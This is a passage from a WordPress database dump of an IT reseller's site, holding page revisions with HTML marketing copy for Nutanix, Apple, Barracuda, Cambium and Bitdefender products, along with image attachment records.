data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-no-pb blocks-md-no-pb blocks-sm-no-pb  default-color-theme\">\r\n<p class=\"p2\">The Nutanix Enterprise Cloud Platform simplifies infrastructure management so you can focus on delivering business value and innovation. Integrated data protection, non-disruptive upgrades, and self-healing systems ensure predictable performance, reliable disaster recovery, and efficient operations at lower cost.Â Get the power of One OS, One Click<sup>TM</sup>.</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-col fl-node-58b08fb514c7c fl-col-small\" data-node=\"58b08fb514c7c\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<h4 class=\"homestory__main__heading\">What is Nutanix Enterprise Cloud?</h4>\r\n<p class=\"homestory__main__text\">Nutanix Enterprise Cloud combines the agility and simplicity of the public cloud, with the security and control you need in a private cloud. Built on the industryâ€™s leadingÂ hyperconverged infrastructureÂ (HCI) technology, it integrates compute, storage, virtualization and networking in a full-stack solution that runs nearly any application.</p>\r\n\r\n<h4 class=\"homestory__main__heading\">Why Nutanix?</h4>\r\n<p class=\"homestory__main__text\">Only Nutanix delivers a single software OS that runs across clouds, making the boundaries between private, public and distributed clouds invisible. Nutanix solutions combine web-scale engineering with consumer-grade management to power any workload in multi-cloud environments.</p>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"fl-row fl-row-full-width fl-row-bg-none fl-node-58ad2a2ac7316 blocks-medium-pt blocks-md-no-pt blocks-sm-no-pt blocks-no-pb blocks-md-no-pb blocks-sm-no-pb     no-scroll-to-section\" data-node=\"58ad2a2ac7316\">\r\n<div class=\"fl-row-content-wrap\">\r\n<div class=\"fl-row-content fl-row-fixed-width fl-node-content\">\r\n<div class=\"fl-col-group fl-node-58ad2a2ac87c4\" data-node=\"58ad2a2ac87c4\">\r\n<div class=\"fl-col fl-node-58ad2a2ac880f\" data-node=\"58ad2a2ac880f\">\r\n<div class=\"fl-col-content fl-node-content\">\r\n<div class=\"fl-module fl-module-gz-text fl-node-58ad2a2ac6a0d fl-animation fl-slide-up fl-animated\" data-node=\"58ad2a2ac6a0d\" data-animation-delay=\"0.0\">\r\n<div class=\"fl-module-content fl-node-content\">\r\n<div id=\"\" class=\"base-text blocks-no-pt blocks-md-no-pt blocks-sm-no-pt blocks-medium-pb blocks-md-no-pb blocks-sm-no-pb  default-color-theme\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Nutanix','','inherit','closed','closed','','1567-revision-v1','','','2018-12-14 16:19:43','2018-12-14 08:19:43','',1567,'https://bintara.com.my/blog/2018/12/14/1567-revision-v1/',0,'revision','',0),(2852,1,'2019-02-07 16:19:07','2019-02-07 08:19:07','','JabraEvolve65t_ProductImage','','inherit','closed','closed','','jabraevolve65t_productimage','','','2019-02-07 16:19:07','2019-02-07 08:19:07','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png',0,'attachment','image/png',0),(2405,1,'2018-12-18 19:15:47','2018-12-18 11:15:47','','imac pro','','inherit','closed','closed','','imac-pro','','','2018-12-18 19:15:47','2018-12-18 11:15:47','',1439,'https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg',0,'attachment','image/jpeg',0),(2403,1,'2018-12-18 19:12:14','2018-12-18 11:12:14','','ipad pro','','inherit','closed','closed','','ipad-pro','','','2018-12-18 19:12:14','2018-12-18 11:12:14','',1439,'https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png',0,'attachment','image/png',0),(2667,1,'2018-12-20 15:52:55','2018-12-20 07:52:55','<h3 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h3>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n<h3>iPAD PRO</h3>\r\n<img class=\"alignnone wp-image-2403\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png\" alt=\"\" width=\"217\" height=\"257\" />\r\n<h4>Why iPadÂ Pro</h4>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"alignnone wp-image-2404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg\" alt=\"\" width=\"220\" height=\"205\" />\r\n\r\n&nbsp;\r\n<h4 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h4>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n<h3>iMAC PRO</h3>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2405\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg\" alt=\"\" width=\"220\" height=\"220\" />\r\n<h4 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h4>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Apple','','inherit','closed','closed','','1439-revision-v1','','','2018-12-20 15:52:55','2018-12-20 07:52:55','',1439,'https://bintara.com.my/blog/2018/12/20/1439-revision-v1/',0,'revision','',0),(2406,1,'2018-12-18 19:16:10','2018-12-18 11:16:10','<h1 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h1>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n<h3>iPAD PRO</h3>\r\n<img class=\"alignnone wp-image-2403\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png\" alt=\"\" width=\"217\" height=\"257\" />\r\n\r\n<span style=\"display: inline !important; float: none; background-color: transparent; color: #111111; font-family: \'SF Pro Display\',\'SF Pro Icons\',\'Helvetica Neue\',\'Helvetica\',\'Arial\',sans-serif; font-size: 32px; font-style: normal; font-variant: normal; font-weight: 600; letter-spacing: 0px; line-height: 36px; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Why iPadÂ Pro</span>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"alignnone wp-image-2404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg\" alt=\"\" width=\"220\" height=\"205\" />\r\n\r\n&nbsp;\r\n<h2 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h2>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n<h3>iMAC PRO</h3>\r\n&nbsp;\r\n\r\n<img class=\"alignnone  wp-image-2405\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg\" alt=\"\" width=\"220\" height=\"220\" />\r\n<h2 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h2>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Apple','','inherit','closed','closed','','1439-revision-v1','','','2018-12-18 19:16:10','2018-12-18 11:16:10','',1439,'https://bintara.com.my/blog/2018/12/18/1439-revision-v1/',0,'revision','',0),(2202,1,'2018-12-14 20:57:37','2018-12-14 12:57:37','<h1 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h1>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n<h3>iPAD PRO</h3>\r\n<img class=\"\" src=\"https://store.storeimages.cdn-apple.com/4982/as-images.apple.com/is/image/AppleInc/aos/published/images/i/pa/ipad/pro/ipad-pro-11-select-cell-spacegray-201810_FMT_WHH?wid=470&amp;hei=556&amp;fmt=png-alpha&amp;.v=1540591661228\" alt=\"Image result for 11-inch iPad Pro\" width=\"258\" height=\"306\" />\r\n\r\n<span style=\"display: inline !important; float: none; background-color: transparent; color: #111111; font-family: \'SF Pro Display\',\'SF Pro Icons\',\'Helvetica Neue\',\'Helvetica\',\'Arial\',sans-serif; font-size: 32px; font-style: normal; font-variant: normal; font-weight: 600; letter-spacing: 0px; line-height: 36px; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Why iPadÂ Pro</span>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"\" src=\"https://store.storeimages.cdn-apple.com/8755/as-images.apple.com/is/image/AppleInc/aos/published/images/m/bp/mbp13touch/space/mbp13touch-space-select-201807_GEO_MY?wid=452&amp;hei=420&amp;fmt=jpeg&amp;qlt=95&amp;op_usm=0.5,0.5&amp;.v=1531167638725\" alt=\"Image result for 13 inch macbook pro\" width=\"258\" height=\"240\" />\r\n<h2 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h2>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n<h3>iMAC PRO</h3>\r\n<img class=\"\" src=\"https://store.storeimages.cdn-apple.com/4981/as-images.apple.com/is/image/AppleInc/aos/published/images/r/ef/refurb/2018/refurb-2018-imac-pro-27-gallery?wid=572&amp;hei=572&amp;fmt=jpeg&amp;qlt=95&amp;op_usm=0.5,0.5&amp;.v=1518826664652\" alt=\"Image result for 27 inch imac pro\" width=\"258\" height=\"258\" />\r\n<h2 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h2>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Apple','','inherit','closed','closed','','1439-revision-v1','','','2018-12-14 20:57:37','2018-12-14 12:57:37','',1439,'https://bintara.com.my/blog/2018/12/14/1439-revision-v1/',0,'revision','',0),(2204,1,'2018-12-14 21:47:43','2018-12-14 13:47:43','<h2>Filters Content, Malware, Social Media and Rogue App Threats</h2>\r\nThe Barracuda Web Security Gateway lets organizations benefit from online applications and tools without exposure to web-borne malware and viruses, lost user productivity, and misused bandwidth. As a comprehensive solution for web security and management, it unites award-winning spyware, malware, and virus protection with a powerful policy and reporting engine. Advanced features ensure that organizations adapt to emerging requirements like social-network regulation, remote filtering, and visibility into SSL-encrypted traffic.\r\n\r\nUnlimited remote user licenses are included to enforce content and access policies for mobile and desktop devices outside of the corporate network. The Barracuda Web Security Gateway is also available as a virtual appliance.\r\n<h2>Enforce Corporate Policies</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_1.svg\" width=\"229\" height=\"218\" />\r\n\r\nIncrease productivity, regulate bandwidth usage, and prevent risky behavior by enforcing granular policies on user activities. The Barracuda Web Security Gateway can control access to web sites, applications, and Web 2.0 platforms based on users, groups, time, bandwidth, and other criteria. SSL-filtering and inspection capabilities provide policy enforcement on social-media and search platforms that are otherwise obfuscated.\r\n<h2>Protect Against Web-Based Threats</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_2.svg\" width=\"314\" height=\"147\" />\r\n\r\nKeep networks and users safe by blocking spyware downloads, preventing viruses, and restricting requests to malicious websites by leveraging intelligence from thousands of collection points worldwide. Our award-winning antivirus and anti-spyware technologies combine preventive, proactive, and reactive measures to deliver industry-leading content filtering and malware protection.\r\n<h2>Monitor Network and User Activity</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_3.png\" width=\"294\" height=\"240\" />\r\n\r\nGain complete insight into user activity and network threats via an intuitive dashboard and integrated reporting. This clear visibility lets administrators create effective policies and generate proactive alerts to properly respond to threats.\r\n\r\nIn addition to powerful on-board reporting, you can also deploy a Barracuda Reporting Server.\r\n\r\nThe Barracuda Reporting Server is a powerful platform that enables unified reporting for Barracuda Web Security Gateways. Designed to meet the demands of reporting on increasing amounts of user and security data, the Barracuda Reporting Server generates accurate, customizable reports in a fraction of the time that it takes built-in reporting engines, while also enabling aggregated reports for multiple connected devices.\r\n<h2>Secure Laptops and Mobile Devices</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_4.svg\" width=\"288\" height=\"209\" />\r\n\r\nExtend security and policies to remote users.Â  With the Barracuda Web Security Agent and the Barracuda Safe Browser, traffic from remote clients can be filtered with the same policies set for on-network users.\r\n<h2>Simplify Management</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_5.svg\" width=\"162\" height=\"239\" />\r\n\r\nCentrally manage the Barracuda Web Security Gateway through the cloud. Configurations on the Barracuda Web Security Gateway are simple and easy-to-deploy ensuring customized network protection is in place in a matter of minutes.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2018-12-14 21:47:43','2018-12-14 13:47:43','',1445,'https://bintara.com.my/blog/2018/12/14/1445-revision-v1/',0,'revision','',0),(2205,1,'2018-12-14 21:53:59','2018-12-14 13:53:59','<h2>Filters Content, Malware, Social Media and Rogue App Threats</h2>\r\nThe Barracuda Web Security Gateway lets organizations benefit from online applications and tools without exposure to web-borne malware and viruses, lost user productivity, and misused bandwidth. As a comprehensive solution for web security and management, it unites award-winning spyware, malware, and virus protection with a powerful policy and reporting engine. Advanced features ensure that organizations adapt to emerging requirements like social-network regulation, remote filtering, and visibility into SSL-encrypted traffic.\r\n\r\nUnlimited remote user licenses are included to enforce content and access policies for mobile and desktop devices outside of the corporate network. The Barracuda Web Security Gateway is also available as a virtual appliance.\r\n<h2>Enforce Corporate Policies</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_1.svg\" width=\"229\" height=\"218\" />\r\n\r\nIncrease productivity, regulate bandwidth usage, and prevent risky behavior by enforcing granular policies on user activities. The Barracuda Web Security Gateway can control access to web sites, applications, and Web 2.0 platforms based on users, groups, time, bandwidth, and other criteria. SSL-filtering and inspection capabilities provide policy enforcement on social-media and search platforms that are otherwise obfuscated.\r\n<h2>Protect Against Web-Based Threats</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_2.svg\" width=\"314\" height=\"147\" />\r\n\r\nKeep networks and users safe by blocking spyware downloads, preventing viruses, and restricting requests to malicious websites by leveraging intelligence from thousands of collection points worldwide. Our award-winning antivirus and anti-spyware technologies combine preventive, proactive, and reactive measures to deliver industry-leading content filtering and malware protection.\r\n<h2>Monitor Network and User Activity</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_3.png\" width=\"294\" height=\"240\" />\r\n\r\nGain complete insight into user activity and network threats via an intuitive dashboard and integrated reporting. This clear visibility lets administrators create effective policies and generate proactive alerts to properly respond to threats.\r\n\r\nIn addition to powerful on-board reporting, you can also deploy a Barracuda Reporting Server.\r\n\r\nThe Barracuda Reporting Server is a powerful platform that enables unified reporting for Barracuda Web Security Gateways. Designed to meet the demands of reporting on increasing amounts of user and security data, the Barracuda Reporting Server generates accurate, customizable reports in a fraction of the time that it takes built-in reporting engines, while also enabling aggregated reports for multiple connected devices.\r\n<h2>Secure Laptops and Mobile Devices</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_4.svg\" width=\"288\" height=\"209\" />\r\n\r\nExtend security and policies to remote users.Â  With the Barracuda Web Security Agent and the Barracuda Safe Browser, traffic from remote clients can be filtered with the same policies set for on-network users.\r\n<h2>Simplify Management</h2>\r\n<img class=\"\" src=\"https://www.barracuda.com/assets/img/sections/products/byf/benefits/benefit_5.svg\" width=\"162\" height=\"239\" />\r\n\r\nCentrally manage the Barracuda Web Security Gateway through the cloud. Configurations on the Barracuda Web Security Gateway are simple and easy-to-deploy ensuring customized network protection is in place in a matter of minutes.\r\n\r\n<img class=\"categoryImage dataImage\" src=\"https://www.barracuda.com/assets/images/common/data_protection.svg\" alt=\"Barracuda Data Protection Icon\" width=\"21\" height=\"24\" />Â  <strong>Data Protection</strong>\r\n\r\nBarracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2018-12-14 21:53:59','2018-12-14 13:53:59','',1445,'https://bintara.com.my/blog/2018/12/14/1445-revision-v1/',0,'revision','',0),(3285,1,'2019-09-24 15:03:26','2019-09-24 07:03:26','<h2>Solutions for all your wireless needs</h2>\n&nbsp;\n<h3><strong>Local Government</strong></h3>\nConnect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.\n<h3><strong>Higher Education</strong></h3>\nClassrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.\n<h3><strong>Regional Service Providers</strong></h3>\nWireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.\n<h3><strong>Oil and Gas</strong></h3>\nWireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.\n<h3><strong>Small Medium Business Retail</strong></h3>\nConnectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.\n<h3><strong>Managed Service Providers</strong></h3>\ncnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.\n<h3><strong>Federal Government</strong></h3>\nOur field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.\n<h3><strong>Retail</strong></h3>\nConnectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience\n<h3><strong>Smart Cities</strong></h3>\nWireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.\n&nbsp;\n<center>[maxbutton id=\"1\" ]</center>','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2019-09-24 15:03:26','2019-09-24 07:03:26','',1451,'https://bintara.com.my/blog/2019/09/24/1451-revision-v1/',0,'revision','',0),(3282,1,'2019-09-24 15:01:13','2019-09-24 07:01:13','<h2>Solutions for all your wireless needs</h2><p>Â </p><h3><strong>Local Government</strong></h3><p>Connect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.</p><h3><strong>Higher Education</strong></h3><p>Classrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.</p><h3><strong>Regional Service Providers</strong></h3><p>Wireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.</p><h3><strong>Oil and Gas</strong></h3><p>Wireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.</p><h3><strong>Small Medium Business Retail</strong></h3><p>Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.</p><h3><strong>Managed Service Providers</strong></h3><p>cnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.</p><h3><strong>Federal Government</strong></h3><p>Our field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.</p><h3><strong>Retail</strong></h3><p>Connectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience</p><h3><strong>Smart Cities</strong></h3><p>Wireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.</p><center>[maxbutton id=\"1\" ]</center>','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2019-09-24 15:01:13','2019-09-24 07:01:13','',1451,'https://bintara.com.my/blog/2019/09/24/1451-revision-v1/',0,'revision','',0),(2413,1,'2018-12-18 19:57:48','2018-12-18 11:57:48','','bitdefender-gravityzone-ultra - Copy','','inherit','closed','closed','','bitdefender-gravityzone-ultra-copy','','','2018-12-18 19:57:48','2018-12-18 11:57:48','',1448,'https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-ultra-Copy.png',0,'attachment','image/png',0),(2416,1,'2018-12-18 19:59:04','2018-12-18 11:59:04','<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR</h2>\r\n<h3 class=\"title\">Itâ€™s Time to Rethink Endpoint Security</h3>\r\n<h3>Protect Endpoints</h3>\r\nOrganizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. Itâ€™s time to rethink endpoint security!Â <span class=\"hidden-text\">\r\nBitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.Â </span>\r\n<h2 id=\"products\" class=\"title-products\" style=\"text-align: left;\">Products</h2>\r\n<span class=\"hidden-text\">\r\n<img class=\"alignnone size-full wp-image-2414\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-elite-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n</span>\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Elite Suite --Â </strong>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-2413\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-ultra-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Ultra SuiteÂ  --Â </strong>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-2415\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-enterprise-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Enterprise Security --Â </strong>Bitdefenderâ€™s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.</li>\r\n</ul>\r\n<h2 class=\"title\">Protect all devices</h2>\r\n<h3>Anti Ransomware</h3>\r\nRansomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes â€“ so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.\r\n<h2 id=\"products\" class=\"title-products\">Products</h2>\r\nAll Bitdefender 